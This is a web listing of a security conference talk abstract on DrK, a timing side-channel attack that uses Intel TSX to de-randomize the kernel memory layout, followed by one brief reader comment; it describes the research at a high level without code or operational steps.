Breaking Kernel Address Space Layout Randomization (KASLR) with Intel TSX

by Yeongjin Jang, Sangho Lee, Taesoo Kim
Sept. 15, 2017 1 comment belen_caty

In this talk, we present a novel timing side-channel attack against KASLR, called DrK (De-randomizing Kernel address space), which can accurately, silently, and rapidly de-randomize the kernel memory layout by identifying page properties: unmapped, executable, or non-executable pages. DrK is based on a new hardware feature, Intel Transactional Synchronization Extension (TSX), which allows us to execute a transaction without interrupting the underlying operating system even when the transaction is aborted due to errors, such as access violation and page faults. In DrK, we turned this property into a timing channel that can accurately distinguish the mapping status (i.e., mapped versus unmapped) and execution status (i.e., executable versus non-executable) of the privileged address space. In addition to its surprising accuracy and precision, the DrK attack is not only universally applicable to all OSes, even under a virtualized environment, but also has no visible footprint.

Steven Ulm 8 months ago

I can't say that I totally agree with your approach towards KASLR, but it's still an interesting point of view...